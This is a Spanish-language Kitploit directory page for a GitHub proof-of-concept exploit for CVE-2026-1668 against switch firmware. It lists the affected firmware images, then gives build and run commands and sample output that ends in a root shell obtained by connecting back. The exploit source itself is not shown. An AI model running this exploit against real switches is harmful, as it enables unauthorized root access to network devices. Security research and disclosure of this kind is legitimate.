Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-1668-poc — Exploit de prueba de concepto para CVE-2026-1668. | Kitploit
Herramientas/GitHubGitHub/tangrs/cve-2026-1668-poc
Seguridad de Sistemas EmbebidosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Hardware e IoTAprendizaje y EducaciónAnálisis de FirmwareExplotación de Binarios
GitHubtangrs/cve-2026-1668-poc

cve-2026-1668-poc

Exploit de prueba de concepto para CVE-2026-1668.

Ver Repositorio
24hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Exploit de prueba de concepto para CVE-2026-1668

Este es un exploit de prueba de concepto para CVE-2026-1668. Está destinado únicamente a fines educativos. No intente explotar sistemas que no le pertenezcan o para los que no tenga permiso explícito.

Este exploit de prueba de concepto se desarrolló contra una imagen de firmware con el siguiente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.

Nombres de firmwares conocidos que coinciden con ese hash (no exhaustivo):

  • SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
  • SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
  • SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
  • SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
  • SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
  • SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
  • SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
  • SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
  • SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
  • SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
  • TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin

Es probable que las versiones anteriores de firmware también sean vulnerables, pero pueden requerir cambios menores en el payload del exploit.

Se puede encontrar una explicación de cómo funciona el payload en esta entrada de blog.

Compilación

Se requiere una cadena de herramientas GCC MIPS Linux para compilar el payload. En Ubuntu 24.04, se puede instalar con sudo apt install gcc-mips-linux-gnu.

root@kitploit:~
$ make

Ejecución

Este exploit debe ejecutarse antes de que el servidor HTTP haya atendido su primera solicitud (es decir, en un arranque recién hecho).

root@kitploit:~
$ ./run.sh

El script debería proporcionarte una shell de root. Si no es así, el exploit ha fallado.

root@kitploit:~
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json

{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc # 
Descargar herramienta